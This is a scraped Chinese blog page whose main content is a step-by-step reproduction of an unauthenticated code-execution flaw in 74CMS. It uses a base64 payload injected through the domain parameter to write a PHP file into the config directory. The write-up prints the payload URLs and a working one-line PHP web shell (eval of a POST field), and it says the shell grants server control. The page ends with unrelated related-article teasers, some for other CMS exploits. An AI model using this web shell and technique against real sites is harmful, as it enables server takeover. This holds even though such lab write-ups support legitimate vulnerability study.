漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。
下载地址:
http://www.74cms.com/download/index.html
下载后解压到phpstudy的根目录www里面
输入网址,http://127.0.0.1/upload/install.php
一直点击下一步,输入数据库名称和密码
进入系统
抓个包看看
将包中的domain后面的改成如下
base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode
然后我们点击send进行发包,看到返回后status等于1,说明状态码正常,发包成功
接下来激活这个发包内容,payload:
127.0.0.1/upload/Application/Common/Conf/url.php
打开看看
发现1.php雀食被写进去了
接下来就是访问1.php了,payload;
127.0.0.1/upload/Application/Common/Conf/1.php
可以看到成功访问phpinfo,说明漏洞存在且被利用wo
我们这次用的是phpinfo,危害不大,如果我们使用一句话木马,就可以造成更大的危害
一句话木马:<?php @eval($_POST['zrtonnn']);?>
将木马用decode改成base64,重复上述操作,即可得到权限
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/357952.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!相关文章
给Java程序猿们推荐一些值得一看的好书
学习的最好途径就是看书 "学习的最好途径就是看书",这是我自己学习并且小有了一定的积累之后的第一体会。个人认为看书有两点好处: 1、能出版出来的书一定是经过反复的思考、雕琢和审核的,因此从专业性的角度来说,一本好…
pr基本图形模板无法使用_PR模板21个时尚排版竖屏封面图形标题动画【资源分享1218】...
AE特效PR剪辑C4D动画影视后期全世界只有不到1%的人关注了你是个很特别的人AE影视后期定期推送「AEPRC4D 影视特效合成 婚庆剪辑调色 电视广告包装 微电影制作 SpeedGrade达芬奇专业调色 摄影等」打造影视后期高端学习平台影视后期 ID:AEPRC4D6【PR模板信息】适用软件…
前端全栈大佬是如何使用javaScript实现一个无缝轮播(最终版)
效果图: 代码如下:
<!DOCTYPE html>
<html>
<head lang="en"><meta charset="UTF-8"><title>优化后的无缝轮播图</title><style>body{-webkit-user-select: none; }ul,li{list-style: none;}#outer{width: 4…
通达OA系统11.2漏洞
以通达OA系统11.2版本为案例的Web渗透
1. 渗透背景:2. 存在漏洞3. 漏洞复现3.1 前台任意用户登录漏洞3.1.1 漏洞原理:3.1.2 手工抓包复现:3.1.3 POC自动获取复现: 3.2 前台未授权访问漏洞3.3 管理后台文件上传漏洞3.4 后台SQL注入…
小白如何从零开始设计并开发一个微信小程序?
背景:微信小程序的出现,让更多的中小型企业初期不再以APP为首选,小程序的天然优势让他备受关注,也因此诞生了专门的小程序开发岗位,让前端有机会继续蚕食其他岗位的份额。 但微信小程序也会很多缺点,最大的就是监管太霸道,各种限制行业进入和权限,未开发的行业还是不能…
mvc2 mvc_每个人都知道MVC…
mvc2 mvc从一个最近的博客中,您可能会发现我最近一直在进行一些采访,就像他们对Web应用程序开发人员所说的那样,我问的一个问题是“您能解释一下MVC模式是什么吗?”,值得赞扬的是,每个候选人知道答案。 对于…
移动端 长按事件_Flutter事件监听
一. 事件监听 在大前端的开发中,必然存在各种各样和用户交互的情况:比如手指点击、手指滑动、双击、长按等等。在Flutter中,手势有两个不同的层次:第一层:原始指针事件(Pointer Events):描述了屏幕上由触摸…
在CSDN的博文中如何添加博主名片
前言:以前看到很多大佬博文中都有自己的名片,我以为是他们自己打字打上去的,自己打上去样式却不理想。今天终于发现了新大陆。分享给你们。 效果图: 设置方法如图:找到创作权益——博主名片——展示博文详情页…
vscode中文设置不生效_VSCode详细安装教程
1.下载https://code.visualstudio.com/download 是Microsoft(微软的产品)User Installer版:会安装在当前计算机帐户目录,意味着如果使用另一个帐号登陆计算机将无法使用别人安装的vscode。System Installer版:安装在非用户目录,例…
毛绒材质渲染_学室内设计必进,建模渲染那都不是事儿
近年来,室内设计从业人员需求量和薪酬持续增长带来的是室内设计行业的飞速发展,而设计能力也成为“创新与创造”的不可或缺。设计能力是多方面能力的综合体现而室内效果图作为设计成果的最主要表现手段,是最基础也是最重要的技能之一。那么持…
2020年末总结,脚踏实地,一步一个脚印——致敬自己一年的心酸历程
摘要:恰逢官方征文,谨以此篇记录自己一年的心酸历程与前端知识的感悟。 目录 在时代工场的主要工作
我为什么从时代工场离职?
如何使用Java 8函数式编程生成字母序列
我偶然发现了用户“ mip”一个有趣的堆栈溢出问题 。 问题是: 我正在寻找一种生成字母序列的方法: A, B, C, ..., Z, AA, AB, AC, ..., ZZ.可以很快将其识别为Excel电子表格的标题,正是这样: 到目前为止,没有答案使…
maven 打包指定依赖包_[Maven]-Maven基础-01-基础概念
Maven基础1.基础概念Maven基础概念什么是Maven什么是理想的项目构建?高度自动化,跨平台,可重用的组件,标准化的什么是依赖?为什么要进行依赖管理?自动下载,统一依赖管理有哪些项目信息ÿ…
关于本人在多个技术平台发布文章的声明
摘要:由于博主有经常记录博客的习惯,很多其他平台的运营或者编辑多多少少会找到我,让我在他们的平台更新文章,写这篇文章主要为了陈述事实与避免纠纷。 本博客会长期维护更新,感谢大家的理解与支持。 孙叫兽目前只在CSDN、开源中国、掘金、infoq、腾讯云+技术社区上更新博…
cmseasy漏洞复现
介绍
提供可视化编辑企业网站管理系统系统、网站模板、以及相关文档资料下载,网站系统完美运 行PHP7环境中。
官方网站: https://www.cmseasy.cn/
cmseasy_7.3.8 任意文件操作漏洞复现 cmseasy_7.6.3.2逻辑漏洞复现 "无需代码,自由拖拽布局,适应…
教你如何看待程序员这个职业的前前后后
现在大家的学历基本提升上来啦,基本搞编程的都是本科或者大专起步,这里仅那本科举例。
好多大学生跟我说是计算机专业,软件工程专业等,啥都学一点,这样真的好? 对于大学生,如果是计算机相关专业…
请领导批阅文件怎么说_刚到公司,应该怎么喊领导,别直接说名字,高情商这样称呼...
刚到公司,应该怎么喊领导,别直接说名字,高情商这样称呼我们都有经历过刚刚从大学毕业出来后,寻求工作的场景。一般来说,我们都是会选择和自己大学所学专业挂钩的职业,在这样的情况下, 我们的选择…
分屏显示_2021元旦高性价比显示器推荐——便携式显示器选购指南(分屏办公、小尺寸办公必备)...
想要告别小显示器选择困难症,挑选到自己心仪的小显示器,大家看这篇文章就够了!显示器是PC的重要组成部分,在应用程序级别具有“场景”属性。显示器的要求因办公,娱乐和学习等不同应用而异。无论应用场景如何࿰…
一键反编译Android包教程
功能介绍 某些时候我们想修改apk包内容,比如汉化某个游戏,这时候就需要修改游戏apk的包内容,并重新签名成安卓手机识别的apk文件,下面详细介绍,文章末尾有一键修改工具。(注意:此工具尚未整合修…
发现一个可视化大屏操作神器FBI,你值得一试
FineBI 是帆软软件有限公司推出的一款商业智能(Business Intelligence)产品。
FineBI 自助分析以业务需求为方向,通过便携的数据处理和管控,提供自由的探索分析。
FineBI 定位于自助大数据分析的 BI 工具,能够帮助企业的业务人员和数据分析师,开展以问题导向的探索式…